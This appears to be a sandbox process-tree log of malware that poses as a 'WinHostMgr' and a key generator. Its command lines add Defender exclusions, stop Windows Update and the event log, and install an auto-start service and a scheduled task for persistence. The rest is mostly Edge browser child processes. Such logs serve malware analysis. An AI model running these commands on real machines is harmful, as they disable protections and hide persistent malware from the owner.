C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1844 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:4012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2436
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4808
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1384
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:216
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:3140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
PID:1480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
PID:4564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5E7.tmp" /F4⤵
- Creates scheduled task(s)
PID:4852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9d42846f8,0x7ff9d4284708,0x7ff9d42847185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:25⤵PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:85⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:15⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:15⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:15⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:15⤵PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4416 /prefetch:85⤵PID:1260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4416 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:1480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:15⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:15⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:15⤵PID:452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:15⤵PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:15⤵PID:3004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:15⤵PID:1304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:15⤵PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:15⤵PID:1140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:15⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:15⤵PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2364 /prefetch:85⤵
- Modifies registry class
PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3348 /prefetch:85⤵PID:1820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:15⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:15⤵PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5104 /prefetch:85⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:15⤵PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:15⤵PID:1296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:15⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:15⤵PID:5928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:15⤵PID:6000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:15⤵PID:5200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:15⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:15⤵PID:5820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:15⤵PID:5888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:15⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:15⤵PID:6112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:15⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7564 /prefetch:15⤵PID:5492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:15⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:15⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:15⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:15⤵PID:3688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:15⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:15⤵PID:6008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:15⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7632 /prefetch:25⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:15⤵PID:5604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:15⤵PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:15⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:15⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:15⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:15⤵PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7472 /prefetch:15⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7320 /prefetch:15⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2196,4820072427316429406,4190729028269400935,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1868 /prefetch:85⤵PID:1596
-
